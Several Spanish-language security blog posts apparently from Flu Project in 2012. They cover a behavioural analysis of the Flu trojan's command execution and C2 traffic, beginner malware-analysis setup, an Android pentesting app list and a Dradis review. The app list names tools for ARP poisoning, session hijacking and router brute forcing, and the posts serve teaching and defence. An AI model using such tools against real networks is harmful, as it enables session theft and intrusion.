Ahora vamos a analizar el comportamiento del troyano al recibir una instrucción desde el panel de control Web de Flu. Para el ejemplo lanzaremos el comando ipconfig, con el que veremos la configuración de red de la máquina infectada.
Si seguimos analizando las operaciones del proceso que ha realizado tras la ejecución del comando, se puede ver como lanza una consola de Windows CMD:


Y vemos como inmediatamente después el troyano ejecuta el comando ipconfig que se le ha ordenado:

Ahora analizaremos la red con Wireshark para ver como se producen los intercambios de información entre cliente y servidor.
Vemos como cada cierto tiempo el bot solicita los comandos que quiere que sean ejecutados y actualiza su estado, indicando que sigue operativo:


A continuación se puede ver como devuelve la respuesta al comando que se le ha solicitado ejecutar:


Mañana continuaremos en el siguiente post de la cadena, hablando de más maneras para detectar el troyano flu y la manera para desinfectarse de manera manual.
Saludos!

13 feb 2012

Empezando con el análisis de malware

Hola!

Muy buenas a todos/as!

Desde que entré a trabajar en el departamento de ecrime en S21Sec sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi vida y ya os aseguro que viendo algún compañero de la empresa como lo realiza..da miedo… jeje.

Los primeros pasos que hice para analizar un  malware es hacer un análisis de comportamiento del mismo, esto se puede hacer por ejemplo desde una máquina virtual y con un Wireshark capturando el tráfico desde fuera, siempre y cuando el Malware en cuestión no tenga una protección de las que detecta que está siendo ejecutado en una máquina virtual. demás existen software que protegen el ejecutable los llamados packers que dificultan el análisis del binario mediante ingenría inversa, pero eso ya lo veremos mas adelante. En este blog ya he analizado algún que otro Malware viendo que conexiones hacía que ficheros de sistema cambiaba etc..

De eso se trata en parte un análisis de comportamiento de Malware. Yo para la gente que quiera empezar lo haría así:

  1. Tener una máquina virtual Windows en Host-Only, preferiblemente.
  2. Tener instalado InstallRite en la máquina virtual.
  3. Tener capturando la actividad de la tarjeta de red con Wireshark

Estos 3 pasos básicos ya nos pueden dar una idea de que hace el malware en cuestión.

Si recordamos el artículo de analizando morto, la cantidad de conexiones que hacía el troyano, vuelvo a poner la imagen que tenía en el artículo:

Y los cambios que hacía en sistema, por ejemplo con InstallRite

Este artículo de hoy es para comentar dos cosas, la primera es que para los que quieran empezar a hacer análisis de malware no os preocupéis si no sabéis hacer ingeniería inversa, aunque os animo a que aprendáis si os vais a querer dedicar, lo segundo es que analizando como se comporta el troyano en si ya sabemos cual es su modus operandi, si el malware se actualiza, de donde etc..

Así que ánimos

Saludos

12 feb 2012

Informe Flu - 58

Comenzamos con el resumen de la semana:

Lunes 6 de Febrero

Martes 7 de Febrero

  • Liberamos a LaW 0.1.1, ya podéis liberar a WiFi con su nueva versión.

Miércoles 8 de Febrero

Jueves 9 de Febrero

Viernes 10 de Febrero

Sábado 11 de Febrero

  • Las viñetas de Flu Project de nuevo de la mano de Juanan y su tableta caliente... Flu-Rambo.

Hasta aquí el resumen de esta semana, acabamos la semana 58 y empezamos la 59, con nuevos artículos interesantes sobre el mundo de la seguridad informática.

10 feb 2012

Herramientas para Pentesters Android

Como muchos sabréis, Android es una plataforma bastante abierta que le da mucho juego a éstos terminales. Hoy quiero publicar esta lista de aplicaciones relacionadas con la seguridad y pentesting que siempre llevo instaladas en mi smartphone, porque nunca se sabe cuando las vamos a necesitar.

  • ANTI (Android Network Toolkit)  El pentesting sencillo desde Android
  • Terminal Emulator Terminal para Android
  • Fing Network discovery, scanner de servicios, ping, etc. Una de las mejores apps que he visto para Android.
  • ArpSpoof Herramienta para envenenamiento de las tablas ARP (requiere root)
  • DroidSheep Robo de sesión con un click. Versión de Firesheep para android
  • Shark for Root Sniffer de red para 3g y Wifi (requiere root)
  • PulWifi Muestra las contraseñas por defecto de alguna redes Wifi
  • Router Brute Force  Como su propio nombre indica, realiza ataques de fuerza bruta a Routers.
  • ConnectBOT  Sencillo pero eficaz cliente ssh para nuestro móvil con función copy-paste.
  • FaceNiff Permite capturar sesiones en redes Wifi de los principales servicios como twitter, facebook, Amazon, etc (requiere root)
  • Shark Reader Indispensable lector de paquetes .pcap
  • andFTP Cliente FTP con soporte para FTP bajo ssl
  • andSMB Cliente Samba para conectarse a recursos compartidos en redes locales. Se integra con Fing
  • ES File Explorer Uno de los mejores exploradores de archivos para Android
  • Network Spoofer Excelente utilidad para redirigir usuarios o cambiar búsquedas de google en redes LAN.
  • SSHDroid Simple pero útil servidor SSH para nuestro dispositivo.
  • Nessus Teenable Cliente para la conexión al servidor Nessus, controlarlo remotamente y ver los informes.
  • VMware View for Android Visor de máquinas virtuales en plataformas VMware

9 feb 2012

Destripando Dradis Framework

El pasado viernes nuestros amigos de Security By Default hablaron sobre la nueva version de Dradis Framework. Hacía ya varios meses que tenía constancia de la existencia de la herramienta, pero no fue hasta el pasado sábado cuando me dio por probarla por primera vez.

Hoy no hablaré de qué es Dradis ni para que sirve, os remito para ello al artículo de SbD, así que me centraré en mi experiencia con la aplicación.

Para la prueba utilicé Windows XP. Durante la instalación de Dradis se me instalaron también las dependencias de Ruby que necesita la herramienta para funcionar, ya que no tenía Ruby instalado en el equipo. Una vez instaladas, al levantar el servidor por primera vez me daba un problema porque no encontraba el archivo "Bundle". @etdsoft por Twitter me dió la solución (¡gracias!), faltaba el PATH de Ruby. Para añadirlo os dejo a continuación los pasos básicos:

Una vez actualizado el PATH podremos arrancar el servidor sin problemas.

Al arrancar la aplicación por primera vez se nos pedirá que indiquemos un usuario y contraseña. Una vez introducidos se nos abre un panel de control con tres apartados importantes, a la izquierda el listado de "proyectos" que carguemos de los diferentes reportes recuperados de Nessus, W3af, etc., y en las otras ventanas el resumen de las vulnerabilidades y demás curiosidades que hayan encontrado estas herramientas.

Aproveché un antiguo reporte de Nessus que tenía a mano y lo cargué en Dradis. Cargar reportes es muy sencillo, basta con ir al upload manager, seleccionar la herramienta a la que pertenece el reporte y buscarlo en el equipo:

Una vez ha finalizado la carga, si volvemos a la ventana principal veremos los datos recogidos en la auditoría con Nessus:

La forma en que Dradis presenta los datos de este reporte es muy similar a como lo hace Nessus, por lo que acumular todos los reportes de las distintas herramientas en Dradis es una auténtica gozada ya que nos facilitará la labor de almacenamiento de la información (yo siempre tengo ficheros txt desperdigados por el equipo). Sin embargo echo en falta algo de color, un poco de rojo, ámbar y verde para indicar la gravedad de las vulnerabilidades, como lo hace el propio Nessus por ejemplo, sería muy útil.

Voy a empezar a usarla a partir de ahora y olvidarme de los ficheros de texto perdidos. Prometo hacer un artículo más completo cuando la haya destripado a fondo.

Saludos!